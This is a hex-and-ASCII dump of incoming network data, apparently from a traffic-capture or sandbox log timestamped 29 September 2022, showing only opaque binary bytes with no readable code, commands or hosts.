                                                                                                                                                            2022-09-29 12:44:59 UTC5520INData Raw: ff cb a9 28 e9 9a 6d 7c 7f 58 78 3a da e5 9b 0e 88 36 34 af c1 38 c3 b9 84 40 54 72 58 38 f3 b1 ca 3a d5 62 88 12 fe 47 96 41 a7 89 e7 ae 96 44 a4 20 5d 14 51 6d f9 e2 87 fd 07 e2 af 07 dc 20 96 e2 65 7b fc 0f 66 82 e1 da ba 20 15 6d a2 66 03 99 0e 0b 32 56 2c a0 2a 49 f6 0e f6 ce 50 9a 88 9e 15 62 07 14 4d 44 cb f7 72 50 a8 9b 71 5e f7 c8 2e 95 07 a0 62 fc f6 1e 9e 8a bd fa f2 bb 30 21 80 12 89 66 f2 55 c1 1f d5 3e e1 af e6 ee 99 72 21 b5 94 3d fa 0b 5b 94 28 a2 69 fe 96 ed 9c db 7d 8e 77 03 36 f6 47 20 e1 3b d2 cd ed 38 83 70 db fd 78 cb 54 53 84 91 8b 05 ea da 78 2a 6c 6c 39 14 f5 c0 87 4c be de 35 46 77 e0 d5 bb 6e b3 01 0b 56 fb ae 42 29 ac ef 81 3b fc 2a d1 59 04 46 f4 18 01 14 53 8b 55 ae cf d9 4b 1c a0 06 ae 18 5c 2e 73 18 68 49 8b 5f 78 0a 3d 28
                                                                                                                                                            Data Ascii: (m|Xx:648@TrX8:bGAD ]Qm e{f mf2V,*IPbMDrPq^.b0!fU>r!=[(i}w6G ;8pxTSx*ll9L5FwnVB);*YFSUK\.shI_x=(
                                                                                                                                                            2022-09-29 12:44:59 UTC5536INData Raw: 62 d6 f0 c0 51 a6 c3 63 fe 35 e2 01 25 cf 02 e8 3e 21 4a e9 b6 10 f2 a5 ea 5a 88 24 00 11 0d 09 99 0f 1c 89 8c 91 56 70 a5 6f 1a 7c 30 d0 a0 61 a2 c2 76 4e 79 43 89 21 88 88 08 a3 45 f3 9d e9 ea ea ff d8 8c cd f7 32 d4 5f 49 74 3b b7 b0 fb b4 3b 8e de fa 3b 12 65 98 ba 3f fb c3 27 81 6a 69 5c e7 79 dd de 03 79 c2 03 76 d1 09 1d 0e 40 fe 1c 17 ea 5a bf 66 c9 e2 da 6a 8b 34 e2 08 ac 43 be a1 9e 4c 6f ba e4 55 89 dd 81 43 52 46 ee 8f eb fb a9 1f 33 bb 09 67 7c 2d b0 8f 43 07 32 9f ca d9 ba 46 f4 89 2e 96 27 95 75 23 60 2d a5 86 63 c8 dc ff d3 70 d3 db 6d 5f b1 9b a5 f6 11 cd 42 ff fd ef b9 91 c8 eb 5d d1 a0 96 d0 d3 9a bf 92 c9 74 41 60 a8 3c 48 e1 26 d6 1f 1a c9 6c 8e 9f 43 f9 d0 39 36 08 f3 ba 9c f6 61 23 12 44 62 2d 76 3b 2b c5 4c be 00 04 ab 60 77 48 55
                                                                                                                                                            Data Ascii: bQc5%>!JZ$Vpo|0avNyC!E2_It;;;e?'ji\yyv@Zfj4CLoUCRF3g|-C2F.'u#`-cpm_B]tA`<H&lC96a#Db-v;+L`wHU
                                                                                                                                                            2022-09-29 12:44:59 UTC5552INData Raw: d4 e6 99 5f ec 42 68 a4 14 26 6c d5 d7 ca 04 d1 da 21 a8 77 ca 42 65 56 84 df e8 fb a1 35 e7 7b 47 7b 8d 2b e6 de 9f 46 aa 15 7c 87 39 e7 86 e7 81 79 1c e6 9f 79 83 17 fe fc 53 28 16 64 74 00 a0 05 71 fe ee 16 49 b3 cf 18 07 c0 dc 5b 6f b4 41 fd 1a 2c 7f 66 b8 0d b7 ce ba d9 40 45 3e fc e5 7a 62 37 5c 56 19 46 de 4c 3f 2e 7c 85 4a 03 9f 36 d8 bd a8 9e 3f d3 01 13 bf 66 d9 cb ae 54 9c 26 f2 cb 49 b3 48 8e 99 c4 fc 9c 17 ef 30 c0 c5 14 8c a4 61 66 9b c1 58 d6 29 1f d2 76 d3 d1 81 68 69 87 e0 61 21 7a f6 ec 60 1a 28 e3 f1 14 f4 55 a2 41 5a a3 a0 7c f5 57 9e 26 ce 00 7e e5 d5 9e dd cf ac f8 4d 44 2d 31 84 2a 82 0b 42 be 95 a0 67 c9 2c 77 e6 7f d0 f8 23 ab 88 d7 00 5e 5c 13 7f 84 c7 30 92 7d 78 15 01 4b 6a ec 42 86 b4 2c 27 ae 57 7d fb 5a 38 a8 6a 9b db bd 79
                                                                                                                                                            Data Ascii: _Bh&l!wBeV5{G{+F|9yyS(dtqI[oA,f@E>zb7\VFL?.|J6?fT&IH0afX)vhia!z`(UAZ|W&~MD-1*Bg,w#^\0}xKjB,'W}Z8jy
                                                                                                                                                            2022-09-29 12:44:59 UTC5568INData Raw: c4 e8 a9 3f d9 c1 23 0c 30 77 d7 6e 05 b6 59 08 25 be 39 6e 56 cf 78 29 25 64 81 1a 85 f6 ee d2 9c 94 c2 0f bf 70 f7 d7 31 c5 7f 39 46 b3 60 1b 37 33 a0 d7 98 54 5d de bb 87 b9 0c ec 69 8c 2b e5 8e bb dd 2c a0 9c 80 61 38 ed c1 45 2e be 34 ac 1b c1 4b 63 b3 8b d7 56 a4 b4 60 7f c8 b4 ac 48 6c 32 73 0b d2 2e 86 e2 d2 29 99 68 30 95 b4 32 98 41 6d e5 76 cc c1 18 38 63 b9 4b 8a a9 c0 90 2f 44 6c ce 88 12 e7 64 18 e5 00 08 bd cf d3 fa 34 38 fb a3 8f cb b0 60 df fb 30 37 23 a7 2c 89 eb 8e db f0 d5 5a b3 0f 6f c1 5e 00 34 0d 41 9a 40 d6 b2 fb b8 82 fb b8 f6 04 cb a7 c1 86 4c fe 0a c2 d4 4a a0 aa 13 89 0b ee 0d 6d 5a 60 3f bb fa 55 a6 a1 2e 50 e5 3d b0 a4 42 d4 93 95 7e c5 e7 6f f2 4c f6 ff d8 fa 0f d4 9e af ee 7c 58 76 5c b3 1d f4 55 4b 53 4c 6f 0c 1b a6 70 12
                                                                                                                                                            Data Ascii: ?#0wnY%9nVx)%dp19F`73T]i+,a8E.4KcV`Hl2s.)h02Amv8cK/Dld48`07#,Zo^4A@LJmZ`?U.P=B~oL|Xv\UKSLop
                                                                                                                                                            2022-09-29 12:44:59 UTC5584INData Raw: 35 1d 60 c4 d9 21 2d 71 8f 7b 5f 21 5e d5 68 f7 51 08 47 3b 65 6a 35 3c d7 e5 cd fb ac 1a 43 a2 ba 4e 54 fb f2 f1 e1 2d 14 34 f6 c3 07 88 61 3b ed b4 e5 69 16 b6 97 92 22 6d c9 e3 47 6f 60 ff e6 02 e4 f2 eb 31 ab 34 86 6e 20 06 57 62 64 4e 4c e7 aa 17 6c 42 2d 8c 89 53 d2 2c 1e 0b 00 2f 92 e9 01 01 65 8a 1b ca df 7f 3d bf 7b 65 c7 7b af 1c 02 7b 76 62 42 4e b7 38 62 a9 2e a5 21 f2 98 24 40 1f 44 55 3b 63 a1 38 f1 8e c0 c5 53 a1 ed d3 a5 59 22 aa 96 09 ce 8f 9a 57 f9 70 42 3c 03 c7 c7 4e b5 65 a6 b8 d4 87 e2 64 46 f6 46 fa a9 e4 7c be 46 39 c3 83 c4 41 9f 23 38 9b 04 46 3b f0 89 b2 e7 9e 75 7c 8a 06 0d d6 73 d9 da 4a 2e 1e 0d 9a 45 d0 1b e8 e5 af cd 84 e3 50 7d 4f 5b 68 2a d4 5f b2 3b 80 b9 ba 09 71 de 2f 6a 42 09 2f f1 09 cc f8 11 d6 41 f8 d6 f0 cd 05 d4
                                                                                                                                                            Data Ascii: 5`!-q{_!^hQG;ej5<CNT-4a;i"mGo`14n WbdNLlB-S,/e={e{{vbBN8b.!$@DU;c8SY"WpB<NedFF|F9A#8F;u|sJ.EP}O[h*_;q/jB/A
                                                                                                                                                            2022-09-29 12:44:59 UTC5600INData Raw: 1d 33 14 6d dc d3 4e 90 bc c6 d7 51 43 ca be 14 a6 a7 ec eb 3d df d3 95 8c aa 80 85 9b c9 18 45 cd 51 4c 6f 5a cb 49 42 fe 19 b3 e2 3e 45 5b 0a 6f 46 ac c0 64 da 66 15 42 fd 56 d2 89 d2 51 84 6f 2a cb a5 eb b7 c5 0d 11 32 1f 18 1a d7 d7 27 a0 13 12 8f 25 c6 61 7d c5 1f 90 df 37 34 78 1e c9 e4 7c 39 87 0c 07 14 2c f6 15 85 2a 65 19 a6 85 e0 63 e4 fa 89 96 a5 29 a0 92 9c 20 b1 09 a5 31 6a 41 21 80 c9 e2 2e a1 18 35 eb 0e 21 6b 9e aa 11 ef 7e 0e c6 97 26 00 a2 05 d3 cf 50 99 1f 25 da 18 9d 58 1e ef f4 82 23 fd 59 9c 94 7c 2d 47 7e f8 6d ba 2a 48 83 5d 22 bf 4a a8 81 ed d7 7f db fa 2c 62 43 b9 e9 17 0e 85 d9 67 07 aa 0b b8 d6 39 2f 77 7a d5 dc be f8 eb 99 d6 74 76 a4 c8 00 04 07 03 cb bb 86 50 a6 2b 69 2f 79 5b 45 9e 7d d1 a5 2f a8 63 5c 1b a3 0f 7d 7a 9d 45
                                                                                                                                                            Data Ascii: 3mNQC=EQLoZIB>E[oFdfBVQo*2'%a}74x|9,*ec) 1jA!.5!k~&P%X#Y|-G~m*H]"J,bCg9/wztvP+i/y[E}/c\}zE
                                                                                                                                                            2022-09-29 12:44:59 UTC5616INData Raw: 82 da 03 86 63 cc 47 1e 37 22 5c b9 ef c4 59 ae 46 2b a4 74 d4 85 0d b1 a4 c0 68 36 9c 80 20 4e 13 5b ca ed 6b 96 e6 47 1b 32 dd 23 7c 5c a2 d1 f0 9e e4 67 d3 69 b4 97 60 e3 63 29 a7 26 d7 c4 33 22 da 86 19 6f 24 60 b1 a5 e5 15 a8 34 40 38 b4 78 c8 6f 61 83 a9 ef 25 f0 f7 a9 65 5b 14 ca 16 33 38 83 eb 87 a5 21 ab a7 c3 51 53 45 49 80 a7 10 ea 9c 0c 6c 3a 51 8a 41 2f 21 d4 48 f8 cd b3 85 d8 f8 13 61 94 83 39 c2 f1 e6 35 13 cc 49 8f 3e 2b 36 ad 51 8d 2a de b7 3a b5 33 e2 36 0b bc ae 3e 84 dc c3 92 68 39 d3 fe 23 11 d7 e0 30 09 d0 83 2f cb 68 75 50 0c 14 e3 07 22 cd 75 ee fd 9a 4e c8 ec ae 48 f2 b8 67 fb ba b7 b5 84 8d 84 4e 0c cc 84 59 0f 81 f1 a2 02 0c f5 1e b1 9f 7e 71 c1 8b 9f af 11 12 cc 9b 07 5c f5 38 fc 4e d9 44 5c 80 11 a7 ac eb c0 8f f6 30 88 dd 78
                                                                                                                                                            Data Ascii: cG7"\YF+th6 N[kG2#|\gi`c)&3"o$`4@8xoa%e[38!QSEIl:QA/!Ha95I>+6Q*:36>h9#0/huP"uNHgNY~q\8ND\0x
                                                                                                                                                            2022-09-29 12:44:59 UTC5632INData Raw: e1 47 c2 c4 69 29 cb 8c bf a2 29 2a f0 94 9b 5c 0f fa 6a e2 c1 08 10 be be 1c 06 f4 1c dc ee e4 0a ee 22 04 f0 82 9e ef ff d0 93 f3 25 8c 38 8d 69 04 4f 87 3a 4d 40 de 36 d2 1b 31 26 1e 48 25 d6 23 4b 47 18 ea 13 28 fa 51 6d 2c f8 ea 76 20 39 ed f9 54 29 5c 76 d8 7f 12 ff 51 44 a0 09 03 50 60 fc 4f 4a 92 66 9a 7d 11 11 39 d3 3f a4 79 be d1 d1 c8 b9 d8 0f 00 11 bd 74 34 7e d0 1d b0 7b a7 94 4d b0 f2 3b d9 30 36 20 eb de 31 88 64 3f fc 54 3f f0 1b 22 0b 3c 26 0d 9d 59 07 13 33 f8 87 8a a4 7e 97 cb db e9 a8 03 49 ed 41 bb f0 d0 3f 6e d4 1e 3e cd 02 cb 07 b3 4e cd 65 51 cb b7 01 84 33 c6 cd 31 cb 5b 04 65 0f ad 93 8b b7 a6 53 b6 78 22 60 45 c1 64 0f f9 7c ab f3 04 86 d8 e7 4c 66 f3 05 47 6f a5 49 aa cf d2 79 e5 6c df 91 e9 c6 7b 0b 8a 51 21 36 13 61 94 a6 bc
                                                                                                                                                            Data Ascii: Gi))*\j"%8iO:M@61&H%#KG(Qm,v 9T)\vQDP`OJf}9?yt4~{M;06 1d?T?"<&Y3~IA?n>NeQ31[eSx"`Ed|LfGoIyl{Q!6a
                                                                                                                                                            2022-09-29 12:44:59 UTC5648INData Raw: 62 a0 f0 af 58 14 a3 2c 89 f8 71 e1 8f fa 36 69 6f 6a ab d8 77 2a 2a e8 da 3f de 97 7f 37 be 70 38 7f b6 d6 e1 bd 90 8d 6e 5f 26 c4 95 83 06 53 7e f8 8b 67 ca 00 16 d1 2b a3 bd e8 df b7 59 9c 3f 0c f5 da 06 13 e0 bc da 28 36 66 0d 4c c9 a8 7a 9c d0 d2 bf b0 50 48 20 59 d2 a0 b0 31 1e 6b 6c 4e 28 ac 0a de cc aa 3a 8e 29 e7 e4 0c 32 6f e2 c3 df 75 08 fb 02 ba dc 87 7f f2 ec 41 30 ac 1c 90 d1 df 74 99 9c 6f 8e cc f1 63 6a be 1d 5c cf ce 42 b1 fc 87 86 f7 63 b0 8e a6 ce 8b d8 3d 0d ca db b7 4c 14 9c 47 7e ed d2 84 c5 a2 1e 0d 3d 91 d8 49 fd d7 1f 0e 61 14 8c 39 71 84 72 0c 79 1d ad ef 51 46 b6 e1 75 33 bb 21 9d 19 0e b0 b9 7d 86 d4 4f 23 c4 1e f5 cd b7 38 cb 91 43 9b 25 f4 3f ee 32 e3 c3 d6 3d 96 f4 d9 8c e3 81 35 68 f4 7d d9 47 e3 97 96 89 e0 65 03 8a a4 cd
                                                                                                                                                            Data Ascii: bX,q6iojw**?7p8n_&S~g+Y?(6fLzPH Y1klN(:)2ouA0tocj\Bc=LG~=Ia9qryQFu3!}O#8C%?2=5h}Ge
                                                                                                                                                            2022-09-29 12:44:59 UTC5659INData Raw: d2 97 9e d0 be af 9e 91 69 8c 19 35 b2 67 77 35 87 8b 9e 6d 61 9a f3 e9 f6 2b de f3 db a2 e0 f6 69 2d e3 b8 fd d7 c5 3f d9 98 6e ca 78 a9 97 4b 3a 60 80 34 de 23 c6 96 57 d5 03 82 34 17 8c 05 65 f4 b5 9d c2 e8 59 79 e7 f8 e1 1b 93 0b 82 78 20 b9 67 b7 2a 05 02 e5 f2 24 d7 a6 ea 52 d7 89 4f a5 50 a4 c9 f0 ea 38 01 51 e7 b2 fd 24 2b f2 5b 62 c9 5e f9 c7 47 52 bd 2c 07 e1 ba 7b 16 3d 3c 14 58 5f 69 49 50 a3 3b 2c 93 e9 0e c3 ba a7 24 d3 de 2d 00 bb b8 92 42 a1 d4 f7 a3 7f 24 10 93 d6 20 34 c3 9b 4e 53 f5 26 00 ca 59 8c d7 ff 82 7f 11 aa c0 18 04 2a 83 6c e2 93 16 7f 1f 13 8a 33 9a 19 9f 5f fc 1d cc 09 d6 fc 2b 7f eb be e8 9f ee 0a 1e c5 f0 16 5c 89 e9 70 f9 f1 f1 69 96 3b 8b 95 c1 dc 0c 8a 2d 22 aa e1 77 76 6f dc 52 20 4b aa 1c c1 b0 6f 80 05 d0 54 78 7b 01
                                                                                                                                                            Data Ascii: i5gw5ma+i-?nxK:`4#W4eYyx g*$ROP8Q$+[b^GR,{=<X_iIP;,$-B$ 4NS&Y*l3_+\pi;-"wvoR KoTx{
                                                                                                                                                            2022-09-29 12:44:59 UTC5675INData Raw: 89 09 27 e0 74 89 10 36 84 92 04 73 57 25 87 54 2e bf 0a f4 f4 96 db 02 9c 5d 5e 03 8f af 68 39 55 89 6d 92 04 4b d6 27 0e 2a 4e b2 3d fe 21 ee 97 7e bf 02 9a 05 e1 f5 d2 61 78 6f cf e6 86 df 4b 11 e2 a7 25 75 99 20 33 ef 93 db fa 93 56 89 ef 4b 4c 52 6a 4d 38 c1 6d 04 b1 0b 3d 7a a6 1a 5c 5b f6 2f cd 52 14 51 15 d3 78 58 a7 89 75 55 03 7b 51 a0 e0 c9 80 36 01 87 70 6d ba 7b 21 6e 53 af 6d 57 4c 1f 50 50 8f 0c 65 a4 2c 7c 64 c7 63 de ae 76 d8 96 e0 f9 94 0a 00 96 eb 84 00 a0 59 e1 4b d9 59 25 c5 78 5d a5 2d 1f b4 38 e0 7f 7b 7e 43 66 0b 3a e9 54 94 ef 27 d5 fe 9c b3 f5 ce 79 70 de c1 85 b6 bf 10 c4 63 ab 1f d0 38 45 d6 ea 2f df 70 0d 84 d8 1c 98 bb af 4d be 5c 3e 67 f2 55 43 a6 54 95 09 8d e2 88 8a 8e 33 14 21 47 f3 2a 4c 00 54 9b 12 da f2 d8 f5 76 76 f5
                                                                                                                                                            Data Ascii: 't6sW%T.]^h9UmK'*N=!~axoK%u 3VKLRjM8m=z\[/RQxXuU{Q6pm{!nSmWLPPe,|dcvYKY%x]-8{~Cf:T'ypc8E/pM\>gUCT3!G*LTvv
                                                                                                                                                            2022-09-29 12:44:59 UTC5691INData Raw: f6 e1 22 f0 f1 3b 13 fb 3b d3 9d 36 61 7a 66 8b 59 ac 6f 2b e4 80 e1 81 97 3e bd df 4f b1 f4 b2 7b c2 46 c3 d2 2c e9 82 16 11 e8 4c bc b3 7a 30 00 ac 75 31 bf 14 cb ed 11 8c c6 5d 75 ea 19 49 d4 18 64 70 ea 3c 03 cc 08 0a 87 63 cb 3b 4a 8c 34 2a e5 3f 59 b5 6c 91 13 66 b6 fc 86 6c 27 a8 ca e0 e2 3b d5 bb c9 59 df e0 31 d9 5c 1e 63 30 f2 dd a5 a3 7e 5e 82 44 c2 7a 1a fd bb 08 57 8f 7a dc c9 02 c1 11 00 8b 2a c5 d6 1b aa 00 bc 8c b4 f1 23 b3 bc 9b db c5 80 a4 db 69 22 75 02 4d dd 28 a8 ca 7b c1 0e ec c8 db 44 0e 9e 51 bd 15 98 b6 f7 61 41 16 19 7f 3d 77 5a a5 ef 6e 44 24 92 70 0a 06 9e b8 60 ae cb 98 6e 1a b8 da 4b 0a 7a f5 c7 4f 5b 3d 12 2e ce 0a 78 03 d2 f3 be 75 c5 a2 94 5d c9 46 f0 11 ff 32 39 6f 8c b0 85 bf c7 ff a1 22 55 25 19 89 d6 31 31 4f a8 c4 81
                                                                                                                                                            Data Ascii: ";;6azfYo+>O{F,Lz0u1]uIdp<c;J4*?Ylfl';Y1\c0~^DzWz*#i"uM({DQaA=wZnD$p`nKzO[=.xu]F29o"U%11O
                                                                                                                                                            2022-09-29 12:44:59 UTC5707INData Raw: d8 9a 04 bb 2e 42 5e db ac 70 42 fc c4 18 b0 c0 89 30 a7 73 a4 14 55 6e c2 f5 35 ea 7d a0 d7 31 96 c0 36 c3 88 7f ab 31 41 53 37 91 99 ba f5 31 41 f9 c2 1d 62 dc 76 88 d8 a7 23 d3 35 62 0c 59 15 78 d7 36 dd 6a de 3f c2 e3 c1 69 63 5e b7 47 e4 90 75 a5 92 e1 36 48 72 ce dc f2 dd 26 dd 81 25 59 13 eb 25 2f 3d c6 e4 8a 8a 25 92 aa f6 80 3a 3d 98 94 e4 69 d7 1b 3d 8e a5 ee d9 e2 dd dc 9f 61 13 48 59 79 52 db 5e 11 4b da 34 f1 07 c2 ac ce a7 c0 3b d8 0c 82 66 0a 48 9e 26 8d e7 d8 4f 19 63 f2 c0 43 ef 31 44 22 75 c1 2e f9 a7 59 53 5e de 9c 60 d4 1a 62 66 c0 8e bc 12 c2 b3 bb 61 b3 25 36 18 a5 0f ed d9 0c b9 63 f5 22 be 9f 7a 93 48 cc 7a 59 2b 0a 32 9c dd 91 f1 0c a4 da 36 74 2e 60 1a af 35 34 22 9d 43 db 60 5a c0 83 4a a6 7c b0 04 6a 19 b4 fe e4 1a 7b 1c d9 39
                                                                                                                                                            Data Ascii: .B^pB0sUn5}161AS71Abv#5bYx6j?ic^Gu6Hr&%Y%/=%:=i=aHYyR^K4;fH&OcC1D"u.YS^`bfa%6c"zHzY+26t.`54"C`ZJ|j{9
                                                                                                                                                            2022-09-29 12:44:59 UTC5723INData Raw: 65 0f a8 7c dc fa 2f 00 5f ed bb 9f aa f6 b8 a3 a5 f9 84 03 0a 74 62 91 2c a8 a7 72 a6 a8 f7 fc b4 a9 6d 6e 54 b0 59 6a b3 53 75 d3 a2 cd a7 80 10 c8 7d 8c 64 7f e3 9e 0e de 86 62 ba 57 be 71 01 b8 6c 9e fa 2c dc 74 31 2c 6a f3 04 ad d3 6b 26 01 69 f6 56 cc 76 2d 00 aa da 25 9a bc 94 40 77 f0 95 02 08 0f d8 10 a5 0f 19 41 b2 08 5d 7c 89 7c cf 2c 37 de 91 4b 71 f8 8c 11 fc 80 62 64 50 a7 f4 8c fd 24 84 8b 17 fa 03 59 aa d3 73 d9 2f 8f 7b 09 cb 08 33 d3 62 6b 44 9c d0 3a 50 8e 05 ea b3 ca 6f d4 c7 03 4e 55 0e a4 df ff 31 08 f0 02 12 15 8a a1 6f 06 1d 02 9e 7f de 8a e3 bc ab aa 29 96 29 4a 53 90 bb 8f 74 ea b1 fa d2 e4 d6 7c c9 e5 94 94 f6 34 0f a5 38 b1 2e 25 88 d2 69 bc 42 50 9e 8e fa 16 31 23 84 db 73 07 4b 65 13 29 d5 8c 8c c9 8b a1 88 0e d4 b8 ae 6a 5d
                                                                                                                                                            Data Ascii: e|/_tb,rmnTYjSu}dbWql,t1,jk&iVv-%@wA]||,7KqbdP$Ys/{3bkD:PoNU1o))JSt|48.%iBP1#sKe)j]
                                                                                                                                                            2022-09-29 12:44:59 UTC5739INData Raw: 0b 66 d2 ad 1b 50 ca 29 bf 3f 92 01 2f 79 d3 c3 01 64 08 48 e7 bb 7e 3b 06 3d c3 85 4f 84 37 e2 1a 10 d1 75 7a 3b 0c 92 22 1b 2e 50 ca 5b 98 ec 34 04 ec a7 2f 64 92 40 f0 a8 31 69 ca d1 7e 33 87 28 8c d7 b2 d7 4b dd 1f 89 29 04 cd c6 7b a0 3a c3 18 b2 14 26 62 7a 96 04 f6 ce 74 09 2f c6 8e 3c 5d 7c 50 3b 07 7d b6 22 51 4d e1 11 ec 02 28 55 6c 06 c0 d4 08 21 86 c6 f6 14 54 e2 af af 70 49 be 2e 13 5d f7 92 3d ff 7e 70 f5 e0 10 80 6f 56 c7 1a b1 6d ff eb 50 0e dc f4 c6 56 f9 7b 97 5b 5f 29 8e 3d e6 f6 10 17 80 99 2e 92 e4 7e 3b 2a 4e 0d 9e 2f 92 0e b6 e2 72 71 0e 8a 0c fc d3 88 5b ea 5f 18 ba 39 7b 20 29 e6 c8 a0 d0 2a 5a ae 35 bb 8e 9a 13 c6 d9 59 2a 7a 86 ea ab b0 75 77 f1 d8 96 5c 24 84 5a 08 2d 58 9e 98 4c ac 90 ae d1 f2 14 a1 17 30 28 f8 2c aa ff 43 ce
                                                                                                                                                            Data Ascii: fP)?/ydH~;=O7uz;".P[4/d@1i~3(K){:&bzt/<]|P;}"QM(Ul!TpI.]=~poVmPV{[_)=.~;*N/rq[_9{ )*Z5Y*zuw\$Z-XL0(,C
                                                                                                                                                            2022-09-29 12:44:59 UTC5755INData Raw: 4a 18 45 a4 88 d6 7b 34 15 fa 6d ea 31 bc 30 1e c1 57 59 a7 85 c3 e1 31 cb 22 5d 27 e4 cf 1e be c6 d7 20 3c cc 54 59 5a d7 58 22 e6 96 ff 3e 40 13 ca 2f 2b f5 45 01 b7 02 cb f8 f4 b6 44 71 27 94 ae 34 3e 48 e6 e8 74 2d 9e 68 2b 65 37 86 fb b0 bd 62 19 d4 62 31 ec 69 83 10 f3 51 87 75 d9 73 ea fd 76 10 4d bd f5 9a b1 16 73 98 d5 0a 0e 32 76 55 83 3f 9a 26 04 14 10 92 65 19 3f 73 ff b6 c5 2e c0 a9 43 fc 8e 66 8a a9 31 0b 0c 36 20 50 a3 7e 09 2f ff 54 ba ef c5 58 16 97 97 f3 4c e7 4b c3 ce 57 14 1d a2 f0 46 97 9d 49 a6 4c 87 1e 07 72 98 ea 97 8b 7a 9a 81 f6 da 35 3d 2d 84 ae 3d 3c 6d e0 d1 b7 5f 14 06 65 8a a6 2e 3e e4 ff 81 be 07 63 be 97 c6 6c 58 05 e5 d9 e8 2a 82 31 2e ff d3 71 8e 6e b9 ee e4 32 c0 db c9 80 4c de be de 20 51 85 db 7c d9 2b 80 6c 9e 5e 0c
                                                                                                                                                            Data Ascii: JE{4m10WY1"]' <TYZX">@/+EDq'4>Ht-h+e7bb1iQusvMs2vU?&e?s.Cf16 P~/TXLKWFILrz5=-=<m_e.>clX*1.qn2L Q|+l^
                                                                                                                                                            2022-09-29 12:44:59 UTC5771INData Raw: 91 dd d8 29 61 eb 7a c7 c9 a2 11 c2 b6 77 21 9b 80 5f dc ea c2 3e be c5 d0 79 a1 46 c1 97 20 c7 03 6f 14 cb 3a c9 ad 4e 98 bf 90 ce 21 4f eb 24 0f 3a 2e 8b 8d 5d 61 20 22 01 67 a8 d5 b2 d8 dc e5 db 3d 83 c6 b1 49 f1 62 fb 04 99 3e ee 11 2e cb 51 6a 28 8a 0b 68 52 9f 56 de 3a 8d 2e f4 d3 12 9e d1 76 e1 1e 89 9e b0 52 49 2e 42 82 a2 45 43 17 21 ff 98 a4 fe 82 42 ea 1e 69 2b 7b 97 41 1e 23 98 a9 70 3a 0b 9f 6e c0 c9 a8 5d d8 2f 53 42 6f 80 f9 3f e5 80 c8 27 3c f8 da d6 f9 72 15 14 f4 24 2f 40 27 43 ca a4 28 d8 d0 13 d4 15 02 e7 ad 3a a4 5a 5f a5 ed 04 f4 ba 36 ea 21 06 fc ec 80 79 59 18 c0 d6 63 46 48 36 65 7e 52 52 c4 d3 8f 8f d5 c7 c3 9d b3 10 c0 08 c2 ca ed 4f f6 76 83 39 c7 17 e1 f0 59 ca 63 64 67 47 6b 3c 74 2d 53 fa 21 cc 22 e6 a4 a0 c5 cd 67 af a7 07
                                                                                                                                                            Data Ascii: )azw!_>yF o:N!O$:.]a "g=Ib>.Qj(hRV:.vRI.BEC!Bi+{A#p:n]/SBo?'<r$/@'C(:Z_6!yYcFH6e~RROv9YcdgGk<t-S!"g
                                                                                                                                                            2022-09-29 12:44:59 UTC5787INData Raw: 21 80 ee 02 1d df d4 2e 3e 83 a7 f9 18 5d eb f5 b0 e9 c9 ba 55 39 e4 24 bd fc 9b 3f c7 16 d4 21 87 63 29 31 c6 2c 19 25 40 20 0c f3 ae fd c7 6d 0e 3d 86 6d 5f f5 8c d1 46 44 4c da a3 a9 07 f4 48 be 23 a1 14 d2 39 20 4a 0b 65 0f 95 85 b1 ce a2 ab bf d4 74 8c a0 a0 3e a4 f1 27 61 70 4e 42 7b 46 20 d3 5f e3 13 f2 2e 08 ff fc 13 94 67 0f 26 bb f6 cf 4e dc a0 f9 70 96 b6 60 dd 44 7e de 07 1d 18 d9 64 c7 a4 75 06 b7 b3 ba c5 55 ca 84 0b c4 35 e2 12 d3 9c f2 bf 3d 7d d2 37 bc 8d 6c dc 50 05 dc 76 2c 10 86 57 28 f2 d6 fc 3b 51 c4 ec 9d b5 ae 77 d0 77 b0 50 c8 57 9f 45 39 88 b6 53 ea 28 9a f2 31 d0 ed 2f e9 0c fe 81 2b 37 13 b7 31 5e 62 d1 67 c2 c7 12 72 79 ec bd 2c be de 72 e6 17 b9 92 d9 7b c7 de 48 f7 f4 5a cb 38 c0 d3 21 c3 19 03 f1 b4 df 2f 2d eb a3 4a 97 16
                                                                                                                                                            Data Ascii: !.>]U9$?!c)1,%@ m=m_FDLH#9 Jet>'apNB{F _.g&Np`D~duU5=}7lPv,W(;QwwPWE9S(1/+71^bgry,r{HZ8!/-J
                                                                                                                                                            2022-09-29 12:44:59 UTC5803INData Raw: b1 a4 7f cb 78 ce 05 4f 28 e6 76 cd 65 af 65 1a cd b0 0a 4f 2e 37 79 64 f7 1b 3f e1 b3 62 4d 74 48 48 34 18 be 4c eb 23 0b 2e 88 5f 4d 3b e3 72 9d fa 6e 00 d4 c9 ad 3d 7c c0 a8 98 51 3d 85 84 44 72 8a 93 fb 26 d2 8f 89 cc 36 9b 49 fe 69 b3 25 3f ef 02 b2 0a e0 1f 28 93 a0 ce c7 21 0f 6c 0e 96 6b 0b 75 21 67 d4 5d 23 95 90 00 08 6e 76 8a 5c 0c 46 95 de 3b a6 81 26 0c 27 5c 38 83 ea 9f 8c db 57 39 8b 11 cc d5 07 9b 3f f0 04 08 56 33 3d b3 b6 4b fa 24 cd 72 a5 05 81 c7 89 ee ef e2 6e e8 32 a5 18 97 28 12 c8 71 ca f0 d9 f9 52 5c 8a be ba 95 1c 0a 40 4d 75 65 15 d8 f2 77 7b 0c 49 73 96 7d d9 30 37 c3 bd 22 ff 8d 6e 31 53 a0 2b 16 89 ad 2c b7 16 e3 49 de a8 19 c5 d8 94 2c 8e 3b e9 c9 d9 c0 66 f7 21 56 24 40 3e 06 47 f2 74 a3 6f 99 d3 75 cd d0 14 8f 31 b6 a6 c0
                                                                                                                                                            Data Ascii: xO(veeO.7yd?bMtHH4L#._M;rn=|Q=Dr&6Ii%?(!lku!g]#nv\F;&'\8W9?V3=K$rn2(qR\@Muew{Is}07"n1S+,I,;f!V$@>Gtou1
